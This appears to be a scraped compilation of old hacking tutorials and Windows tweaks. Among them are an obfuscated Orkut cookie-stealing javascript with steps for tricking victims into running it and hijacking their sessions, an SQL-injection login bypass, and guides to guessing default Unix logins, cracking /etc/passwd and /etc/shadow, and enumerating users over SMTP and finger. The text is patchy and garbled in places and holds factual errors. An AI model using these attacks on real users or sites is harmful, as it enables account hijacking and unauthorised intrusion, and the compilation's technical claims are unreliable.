4. Click on the button "I agree an wish to surf anonymously".
After it there will be no LIMIT.
Download from megauload.com:
Here's my tutorial to download from megauload.com without getting the annoying message of 300 slots busy.
Downlaod user agent switcher ADDON then follow the instruction
For FIREFOX:
Click Install Now to install addon.
Restart FireFox. Tool-->User Agent Switcher--->Options--->Options
Click User Agents--->Add
Type this:
◘ Description: MEGAUPLOAD
◘ User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Alexa Toolbar)
Click OK twice to finish adding User Agent.
From now, before downloading any file on megaupload just go Tools--> User Agent Switcher--->MEGAUPLOAD.
For IE:
Start/run->> type regedit -> ok
Go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\5.0\User Agent\Post Platform]
Note: if U use IE 7
go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\User Agent\Post Platform]
Right click on Post Platform > New > String Value > type Alexa Toolbar > ok
Now U can download from megaupload without error
Orkut Hacking Same as Cookie Stealer !!
then make two fake accounts...u will need one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...
then heres the script
Code:
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
u see the 62915936 part? thats the one u need to edit to get the cookie to your account..... HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
go to YOUR ALBUM section...go to ANY photo and right click on it,see the properties of your display image...u will see something like 12345678.jpg
there will be a eight digit value.. now put that value in the above javascript.thats it. now your javascript will look like
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
Now give this script to the victim, ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook..
now after getting a cookie...go to your home page and open the cookie editor plugin(TOOLS-->COOKIE EDITOR)...type orkut in the text box and click filter/refresh.look for orkut_state cookie. just double click it and replace the orkut_state part with your victims...
no need to change the _umbz _umbc part...
ANOTHER SCRIPT: 100%working
javascript:nobody=replyForm;nobody.toUserId.value=53093255;nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?Action.submit';nobody.submit() put ur eight digit number in the place of (53093255)

Hacking websites !!
Not For all Websites
If you have the html and javascript knowledge then you can access password protected websites.
1. Open the website you want to hack. Provide wrong username-password in its log in form.
(e.g : Username : me and Password: ' or 1=1 --)
An error will occur saying wrong username-password. Now be prepared
Your experiment starts from here...
2. Right click anywhere on that error page =>> go to view source.
3. There you can see the html codings with javascripts.
4. There you find somewhat like this.... <_form action="..login....">
< =..login....>
5. Before this login information<=__LOGIN> copy the url of the site in which you are.
(e.g :"<_form..........action=http://www.targetwebsite.com/login.......><..........=HTTP: com="">")<..........=HTTP: com="">
6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)
7. Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> " there <=TEXT>instead of "<_type=password>"<=TEXT><=>. See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )
8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\eg.html)
9. Reopen your target web page by double clicking eg.html' file that you have saved.
10. U see that some changes in current page as compared to original One. Don't get worried.
11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]
Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.
[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]
The above trick won't work on the websites using latest technique to protect there servers. But you can find many sites !!
Enjoy !!

Secret Backdoor !!
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
You're done!
You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Introduction of IP Addresses !!
Every system connected to the Internet or connected to a particular network has a unique Internet Protocol Address of an IP Address. Just as in the real world every person has his or her own Home Contact Address, similarly every system connected to the Internet has its own unique IP Address. Your IP Address is the address to which data should be sent to ensure that it reaches your system. The IP Address of a system acts as the system’s unique identity on the net.
Structure of an IP Address:
An Internet Address (IP Address) is a 32-bit address or number, which is normally written as four decimal numbers (of 8 bits each), each separated from the other by a decimal. This standard is known as the dotted-decimal notation.
For Example,
A Typical IP Address would be as follows: 192.168.1.1
It can be further broken down as:
192 representing the first 8-bits.
168 representing the next 8-bits.
1 representing the third 8-bits.
1 representing the fourth 8-bits.
Thus when considered together 192.168.1.1 represents 32-bits. So basically we can conclude that each decimal in an IP Address represents 1 byte or 8 bits. It is important to note than an IP Address can contain numbers from 0-255.
There are a huge number of IP Addresses in use in the present day wired age. All these IP Addresses have some sort of relation with each other and each individual IP Address can reveal a lot of secrets about the Network, of which it is a part. Before we move on to that, we need to understand the fact that all IP Addresses being used are divided into a number of ranges, which are as follows:
Class Range
A 0.0.0.0 to 127.255.255.255
B 128.0.0.0 to 191.255.255.255
C 192.0.0.0 to 223.255.255.255
D 224.0.0.0 to 239.255.255.255
E 240.0.0.0 to 247.255.255.255
We can easily conclude that one can find out the Class to which an IP Address belongs to simply by comparing the numeral before the first decimal of the IP Address with the above table.
For Example,
In The IP Address 192.168.1.1, the number before the first decimal is 192 and the above table tells us that it belongs to Class C of the range of IP addresses.
The various IP Addresses are divided into the different classes on the basis of the structure of their Network or in other words on the basis of what the various numbers separated by decimals actually stand for. To understand this, let us refer to the following:
Class Information
A It has the first 8-Bits for Netid and the last 24-bits for Hostid
B It has the first 16-Bits for Netid and the last 16-bits for Hostid
C It has the first 24-Bits for Netid and the last 8-bits for Hostid
D It represents a 32-bit multicast Group ID.
E Currently not being used.
The above table will be clearer after reading the following examples:
Examples:
An IP Address 192.168.1.1 belonging to Class A means that the network ID is 192 and the host ID is 168.1.1
If the Same IP Address belonged to Class B, then the network ID would become 192.168 and the host ID would become 1.1
And if it belonged to Class C then the network ID would become 192.168.1 and the host ID would become 1.
Almost all ISP’s prefer to use a Class B Network. If that is the case then each time you login to your ISP, then the first 2 octets of your IP Address would not change, while the last two are likely to change. However, even if only the last octet changes, and the remaining three remain constant, it is likely that the ISP uses Class B addressing.
How do you find out the IP Address of your own system?
In order to get your own IP Address all you have do is, follow the below process:
1. Connect to the Internet.
2. Launch MSDOS.
3. Type: netstat –n at the prompt.
You will get an output similar to the below:
C:\WINDOWS>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 192.168.1.1:1025 64.4.13.56:1863 ESTABLISHED
TCP 192.168.1.1:1031 209.143.242.119:80 ESTABLISHED
The IP Address shown under the Local Address Field denotes the IP address of your system.
An IP Address, which belongs to the Class-A addressing system having a network ID equal to 127, is referred to as the special address. It is actually known as the Loopback Interface. It allows clients and servers on the same system to communicate with each other.
The loopback address, which is commonly used, is 127.0.0.1. Almost all systems have also given the loopback address the special name ‘localhost’.
Hide your IP using Proxy Server !!
2. Type the website address there after selecting the language.
3. Then press Enter.
4. You are now viewing the website anonymously.
5. The Website Administrator does not know your IP Address. He sees a IP Address from some part of the world.
How to Defeat Java Script Protected Sites !!
Try typing target_com/images .(almost every web site has an images directory) This will put you into the images directory, and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory.
ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories. What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.
We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url target_index you will be onthe index page and ready to follow the links for downloading.
Danger of ''ctrl+c'' in web !!
1) Copy any text by 'ctrl+c'
2) Click the Link: http://www.sourcecodesworld.com/special/clipboard.asp
You will see the text you copied on the Screen which was accessed by this web page. (Check it out !!)
Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.
Be cautious ...
To avoid Clipboard Hack Problem, do the following:
1. In Internet Explorer, Go to Tools -> Internet options -> Security
2. Press Custom level.
3. In the security settings, select disable under Allow paste operations via script and click on 'OK. (Now the contents of your clipboard are safe.)

Speed Up Win XP !!
1. To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.
2. If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.
3. Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.
4. Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.
The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.
Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature,
Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.
5. Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS.
6. Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.
7. In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.
8. Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.
9. Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it.
10. Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts.
11. Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.
12. Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.
13. If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.
14. Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.
15. Update anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.
16. Make sure you fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.
17. Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.
18. Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.
19. If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.
20. Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.
21. If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.
22. At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks.
Some Registry Tricks !!
You can add "Open With..." to the Right click context menu of all files. This is great for when you have several programs you want to open the same file types with.
1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.
Customize the System Tray
You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you cannot do this if you are using any of our software during the trial period; it will corrupt the trial license.
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, "s1159" and "s2359"
4. Right click the new value name and modify. Enter anything you like up to 8 characters.
If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM.
LockOut Unwanted Users
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value "MustBeValidated"
4. Set the value to 1
This forced logon can be bypassed in Safe Mode
Disable the Outlook Express Splash Screen
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\OutLook Express
3. Add a string value "NoSplash"
4. Set the value data to 1 as a Dword value
Multiple Columns For the Start Menu
1. Open RegEdit
2. Go to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced
3. Create a string value "StartMenuScrollPrograms"
4. Right click the new string value and select modify
5. Set the value to "FALSE"
Changing Windows' Icons
You can change the Icons Windows uses for folders, the Start Menu, opened and closed folder in the Explorer, and many more.
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Shell Icons
3. Add a string value for each Icon you wish to change.
Example: "3" ="C:\Windows\Icons\MyIcon.ico,0" This will change the closed folders in the Explorer to "MyIcon.ico". Here is a complete list for each value.

Custom Folder to My Computer or the Desktop !!
Create the following series of keys and values in the registry at [HKEY_CLASSES_ROOT\CLSID] or [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID]. The GUID, globally unique identifier, can be a random number, in this example "FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345" is used.
Create a new key called [HKEY_CLASSES_ROOT\CLSID\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}] and set (Default) to equal the name of the folder e.g. "My Folder".
Create a new sub-key under the main key called "DefaultIcon" (i.e. [HKEY_CLASSES...ABCD1DE12345}\DefaultIcon]) and set (Default) to equal the filename for the icon you want to display e.g. "c:\windows\myicon.ico".
Create a new sub-key under the main key called "InProcServer32" (i.e. [HKEY_CLASSES...ABCD1DE12345}\InProcServer32]) and set (Default) to equal "shell32.dll", also create a new String value called "ThreadingModel" and set it to "Apartment".
Create a set of sub-keys starting at the main key "Shell\Open My Menu\Command" (i.e. [HKEY_CLASSES...ABCD1DE12345}\Shell\Open My Folder\Command]) and set (Default) to equal the command to execute when clicked, in this case explorer, e.g. "explorer /root,c:\MyFolder".
Create a set of sub-keys starting at the main key "ShellEx\PropertySheetHandlers\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}" (i.e. [HKEY_CLASSES...ABCD1DE12345}\ShellEx\PropertySheetHandlers\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}])
Create a new sub-key under the main key called "ShellFolder" (i.e. [HKEY_CLASSES...ABCD1DE12345}\ShellFolder]) and create a new Binary value called "Attributes" and set it to "00 00 00 00".
(Optional) To place the folder on the desktop add the following key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Desktop\NameSpace\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}]
(Optional) To place the folder in My Computer add the following key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\MyComputer\NameSpace\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}]
Now the folder cannot be deleted from the desktop or My Computer, nor can it be renamed other than removing the CLSID and the entries under NAMESPACE.
Play Music in G talk !!

An introduction to hacking !!
--------------------------
This is a brief tutorial designed to show you how to get started with
hacking. It is not an in depth analysis of Unix and I will not show you how
to hack specific systems or give you any specific usernames or passwords.
Anything that you do after reading this file is NOT my responsibility, so
don't expect me to write to you in jail if you get caught. If you are an
advanced hacker, then I suggest you give this a miss as it's designed for
beginners...
Section 1 : What exactly is a hacker then?
Tricky one really. There are hundreds of definitions floating around, but
the basic description of a hacker would be someone who accesses and uses a
computer system in ways which a normal user might not think of. This may be
legal, but chances are that it will be illegal. Also, many hackers might not
consider you to be one of them unless you have the hacker attitude.
Basically what this means is that you have a certain view over the way in
which things should be done. For example, nearly all hackers are anti
authoritarian. Another thing which you really should do is give voluntry
help to other hackers. This may be in the form of debugging programs that
they have written, informing them of new bugs in systems e.t.c.... There are
plenty of detailed FAQ's out there, so I won't go into it in detail. Try
looking up 'hacker ethics' in any descent search engine (www.altavista.com
is pretty good) for more
Section 2 : Tell me how to hack!
Yeah right. You ask any hacker or newsgroup this and your gonna get flamed.
Flaming is when someone responds to your question by throwing a string of
anger and obsenities at you because they are mad. Why would they do this?
After all hacking is about giving voluntry help isn't it? Well, asking how
to hack is not only far too general, but it's also pointless. Nobody can
tell you how to hack. They can give you passwords, programs and bugs, but
they by doing this they would be stopping you from learning and discovering
new things, and let's face it, the best way to learn to hack is to do it.
Section 3 : Where to learn
Apart from actually hacking, the most important thing you can do is read.
Texts can come from a variety of sources, including your local library and
of coarse the internet. There are some around with titles like 'The secret
underworld of hacking' but these are mostly a waste of time, and contain no
valuable information. Instead, read books with titles like : 'Unix : An
introduction' or 'How to teach yourself Unix'. These will contain a wealth
of commands and information. You will not learn by simply downloading
programs to do your work for you, although some are essential (I'll tell you
which ones later).
Section 4 : The art of hacking
Hacking is in many ways an art. It takes time, patience and intelligence.
You won't get immediate gratification, but if you do get good, then it's
really worth it. There are several skills accosiated with hacking, but the
fundemental one, which is often overlooked by newbies is the ability to
program. Programming is basically telling the computer what to do, and a
programming language is the way in which you write it. Again, there are
millions of tutorials to do with this subject, and it is FAR too big to go
into here. The basic languages you will need to know are perl and c, which
are the main languages for the Unix operating system (I'll go onto that in a
second). Again, any good search engine will give you hundreds of sites
realted to these. Just to give you an idea of what programming is about,
here' some c source code (that's the text before it is compiled/interpreted
so the computer can understand it):
#include
using namespace std;
int main()
{
cout<<'Hi there, how are you!';
}
Note that this section of code is taken from a MSDOS application. Unix will
differ slightly. Although it can be a bit tedious, programming is very
rewarding, and is very important if you want to become a good hacker. You
won't need to become some programming genius to hack though, just have a
general idea of the syntax used by the languages. The next important skill
you need to learn is how to use the Unix operating system. This is an
operating system (like windows or DOS) which is specifically designed for
networking. Most big servers use it and it allows thousands of users to
connect to virtual (software) and hardware ports remotely ( if the computer
it is operating has them). Like programming, Unix is very complicated and
detailed, so I can only give you an introduction here. The best way to teach
you what Unix is is to give you an example. This example assumes that the
person using it has a shell account (a user name and password so that he can
log in and use the computers), and that the user has windows on their
computer. It is entirely fictional:
(In the run bar)
telnet shinracorperation.com 23
(Telnet starts up, there's a brief pause before the cursor starts flashing)
SunOS : 5.10
login:rudolf
password:########
Welcome to the shinra corperations main server. Type 'help' for more.
$
That is an example of a typical Unix system. To operate it, we run telnet
(the standard telnet program included with windows), this will allow our
computer to communicate with the remote server which is
shinracorperation.com. The number 23 after it tells telnet to connect to
port 23 on the computer. Ports allow remote users to input commands to the
computer. A computer can have thousands of ports, each with a different
number, but the most common and what they do are:
13 : Date and time port (pretty useless really)
21 : FTP (File transport Protocal) port
23 : Standard telnet port. This is the port which the telnet program will
try to open by default
25 : Send Mail port. This allows the user to operate an ancient send mail
program which can send messages to email addresses on that server (more
later)
79 : The 'finger' port. This allows the user to type in the name of a user
and get details on them (very useful)
80 : Standard http port (it's the one your browser opens)
110 : POP port. Allows you to operate a primitive POP email program.
To connect to each of these ports you would put the number instead of 23 in
the command line. The next line tells us what type of operating system the
computer is using. This will become important if you need to use a bug or
back door to get into the system, as they vary from operating system to
operating system. One advantage of Unix operating systems is that they don't
record your login attemps, so the sysadmin won't find 6000 attempts in his
log file when he has a look. Now, the only thing holding us back here is the
need for a username and password. In the early days of hacking, you could
telnet to any computer, type in root as your username and root as your
password and you'd be in with superuser privialges (root is the username
that should give you the ability to do anything on that computer). That
ain't gonna happen these days. There are some servers which you might be
lucky enough to guess a username and password on, so have a look at the list
below of common Unix users:
root
admin
adm
sysadmin
guest (VERY often the password will be guest too)
test
demo
uucp
Although unlikely, these may work if you enter the password the same as the
username, it's worth a try. I hope that gave you an idea of what Unix is.
The final part, by the way, was the command prompt, similair to the C:\>
prompt in DOS. Here you would enter commands for the computer. Since this is
only an introduction, I won't go into commands here, but there are plenty of
books, many from your local library which will tell you how to use Unix. You
can find more information on how to exploit bugs in Unix operating systems
and backdoors in them by using a search engine. Chances are that you will
not be able to guess the password. In this case you'll need to do some
research. Try looking at the companies web site, and finding out things
about them.
Section 5 : Toolz
Although you should use them as little as possible, you will need to use
some programs. One of the most essential is a password cracking program. In
most Unix systems, the password file is located in /etc/passwd. As I've
said, there are plenty of files which will tell you how to download it, so I
won't go into that here. Now, assuming you've got the password file, you'll
need a program called John the Ripper deencrypt the file and get the
passwords. If you open the passwd file with a standard editor like notepad
or edit, you will see something like:
root:h589798Hhgh:0:0:/etc
or
root:x:0:0:/etc
With many more lines added on. If it looks like the first one, then not only
are you lucky, but you've got the passwords for the entire system. Now run
Jack the ripper on it, and if your dictionary file (a file with lots of
standard passwords in it) is good enough, you should at least get a few of
the passwords. If you get root, then get very, very excited. You can now log
into the system and do anything. BUT be warned, you do ANY damage what so
ever, and they'll find you within a couple of hours, so DON'T. Not only
that, but it'll make you a cracker which is someone who breaks into a system
to do damage to it, they are looked down upon by real hackers. Now, if it
looks more like the second one, get ready to cry 'cos the password file is
shadowed. This means that although the users are stored in the passwd file,
the passwords are stored in different one, usually /etc/shadow. This
obviously means that you must download the shadow file (the server probably
won't let you), merge it with the passswd file, and then run john the ripper
on it. If you can get both the passwd and shadow files, you'll need to get a
program called VCU to merge them, although there are some others around.
Shadowing is used by most servers these days, and makes life a hell of a lot
more difficult
Section 6 : Using programs on the server
The first program I'm gonna look at is SMTP (send mail) which is usually
stored on port 25. I'm not gonna give any direct examples here, but replace
the xxx part with virtually any server name and you should find one:
telnet xxx 25
SMPT Version 1.3 Ready
And that is all you get. You are now ready to run this program. It allows
you to send mail to anyone who has an email address within that server. The
commands that you'll need to know to use this program are
help - gives you a list of commands. If you follow it with a command, it
will give you help on it
helo - This tells the computer who you are
mail from:xxx - It will say who the mail is from on the message (replace xx
with a made up or real email address)
rcpt to: - Who the mail will go to. It must be within the server that you
are hacking or you will get the error 'Relaying not allowed'
data : Press enter, and type in what you want the message to say. Put a full
stop (a period) and a seperate line and press enter to end and send the
message
quit : Disconnects you
vrfy xxx : Replace the xxx with a user name, and it will tell you if it
exists
This should give you a basic idea of how to use the program. The commands
should come in that order to send mail (vrfy is not needed to send mail, you
can simply use it to tell if a user exists. Oh yeah, and you won't see what
you type in.
The other program I'm gonna look at is in port 79 so type:
telnet xxx 79
You will be greeted by, well nothing. Loads of servers have closed this
port, but if they have it open, then it is very useful. All you do is type
in the name of the user you want to finger, and it will give you their
account details. Try all of the common users above. This program will
usually only let you finger one user before disconnecting.
Conclusion
I hope this has been an informative introduction into the world of hacking.
Even at this level, there are tonnes more things which you will need to find
out about so that you can hack. I suggest you look the following things up
in your search engine:
Unix operatins system
computer security
hacking
c programming
perl programming
hacking tutorials
Hopefully you will find what you need. One last word of warning, be VERY
careful about hacking, and don't do any damage, you WILL get caught if you
do. Oh yeah, and have fun...

Hide the users on the Welcome Screen !!
Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon\SpecialAccounts\UserList\Right-click an empty space in the right pane and select New > DWORDValue
Name the new value exactly as the Username Leave the Value data as 0
If you want to enable this user again on the Welcome Screen, either double-click the Username value, and change the Value data to 1, or delete the Username Close the registry editor
Make Your Cd Autorun !!
2• now you write This
[autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE
Now save it but not as a .txt file but as a .inf file.
But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi
3• Now burn your CD with the autorun .inf file included.
4• Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive .

Methods Of Cracking Any e-mail Passwords !!
Most hackers does not really hacking passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers, instead they will go for the easy way - the end user, that's you. It's not what you see on the movies such like "Hackers," "SwordFish," and so on. Too good to be true! They don't actually hack, but logs every stroke on your keyboard including the passwords you have input.
Keep in mind that computer surveillance Programs should be used only if necessary, it was not created to invade someone's privacy. If you are going to use it, be a responsible user.

How to Hack (Basic Tips To Start Hacking ) !!
what they do to Hack?
These are the common enough question, asked on nearly every hacking board across the web, and yet, no one seems to be able to answer it.
One reason for this is the fact that the vast majority of people who really don't have, want, or need a clue. Then there's a small minority who have a good basic knowledge but simply not enough conviction to teach. Then there's the tiny minority who really know the ins and outs of computer systems, they can program exploits, bug fixes, and can generally fix, or find out how to fix nearly any problem. These are the people referred to as computer experts. An even smaller percentage of people again are called hackers. Hacker is a term that over recent time has been changed and exploited by the media to mean someone who breaks into and destroys a computer system. I don't like these people. These are the people who give true hackers a bad name. By dictionary definition, a hacker is someone who has an extraordinary ability to push a computer system, or program, to work beyond expected boundaries, "He hacked away at the program all night until he got it to work". A Hacker, in the true meaning should be respected, the modern interpretation, someone who breaks systems is traditionally known as a cracker
The biggest reason for someone to truly want to become a hacker is to learn. There's no bigger reason than this. The simple craving to learn about, change, understand and improve a computer system and/or program is the single biggest goal for any hacker. Maybe the second biggest reason behind hacking is freedom. To understand this you must fist understand what I talked about in the previous paragraph, that hacking is not breaking systems, but improving them. Any one who considers themselves half knowledgeable about the Internet should have heard of Gnu/Linux. If you haven't please refer to http://www.linux.org/info/index.html. Linux and the GNU project embody the spirit of what I consider to be a true hacker goal. The ideas of freedom, improvement and development should be at the heart of every hacker's life. The Internet itself is another representation of this ideal. There is no one owner of the Internet; anyone can access it for no costs other than that of a phone call. The Internet is the single biggest source of information the world has ever seen. It contains information on billions of subjects, the vast majority of which is absolutely free. A person with a connection to the Internet can access information on everything from quantum computing to the exploration of mars, from pro-anarchy to pro-capitalist. It allows all this information to be accessible to 